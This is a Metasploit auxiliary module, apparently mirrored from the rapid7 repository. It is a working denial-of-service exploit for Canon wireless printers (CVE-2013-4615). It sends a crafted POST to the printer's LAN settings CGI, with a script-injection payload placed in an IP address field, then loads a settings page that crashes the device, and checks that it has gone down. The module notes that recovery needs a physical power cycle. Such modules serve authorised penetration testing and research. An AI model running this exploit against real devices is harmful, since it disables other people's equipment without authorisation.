Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/canon_wireless_printer.rb
19852 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Canon Wireless Printer Denial Of Service',

15
        'Description' => %q{

16
          The HTTP management interface on several models of Canon Wireless printers

17
          allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:

18
          if this module is successful, the device can only be recovered with a physical

19
          power cycle.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => [

23
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'

24
        ],

25
        'References' => [

26
          [ 'CVE', '2013-4615' ],

27
          [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']

28
        ],

29
        'DisclosureDate' => '2013-06-18',

30
        'Notes' => {

31
          'Stability' => [CRASH_SERVICE_DOWN],

32
          'SideEffects' => [],

33
          'Reliability' => []

34
        }

35
      )

36
    )

37
  end

38


39
  def is_alive?

40
    res = send_request_raw({

41
      'method'	=>	'GET',

42
      'uri'	=>	'/'

43
    }, 10)

44


45
    return !res.nil?

46
  end

47


48
  def run

49
    begin

50
      # The first request will set the new IP

51
      send_request_cgi({

52
        'method'	=>	'POST',

53
        'uri'	=>	'/English/pages_MacUS/cgi_lan.cgi',

54
        'data'	=>	'OK.x=61' \

55
          '&OK.y=12' \

56
          '&LAN_OPT1=2' \

57
          '&LAN_TXT1=Wireless' \

58
          '&LAN_OPT3=1' \

59
          '&LAN_TXT21=192' \

60
          '&LAN_TXT22=168' \

61
          '&LAN_TXT23=1' \

62
          '&LAN_TXT24=114"><script>alert(\'xss\');</script>' \

63
          '&LAN_TXT31=255' \

64
          '&LAN_TXT32=255' \

65
          '&LAN_TXT33=255' \

66
          '&LAN_TXT34=0' \

67
          '&LAN_TXT41=192' \

68
          '&LAN_TXT42=168' \

69
          '&LAN_TXT43=1' \

70
          '&LAN_TXT44=1' \

71
          '&LAN_OPT2=4' \

72
          '&LAN_OPT4=1' \

73
          '&LAN_HID1=1'

74
      })

75
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE

76
      print_error("Couldn't connect to #{rhost}:#{rport}")

77
      return

78
    end

79


80
    # The second request will load the network options page, which seems to trigger the DoS

81
    send_request_cgi({

82
      'method'	=>	'GET',

83
      'uri'	=>	'/English/pages_MacUS/lan_set_content.html'

84
    }, 5) # default timeout, we don't care about the response

85


86
    # Check to see if it worked or not

87
    if is_alive?

88
      print_error("#{rhost}:#{rport} - Server is still alive")

89
    else

90
      print_good("#{rhost}:#{rport} - Connection Refused: Success!")

91
    end

92
  end

93
end

94


95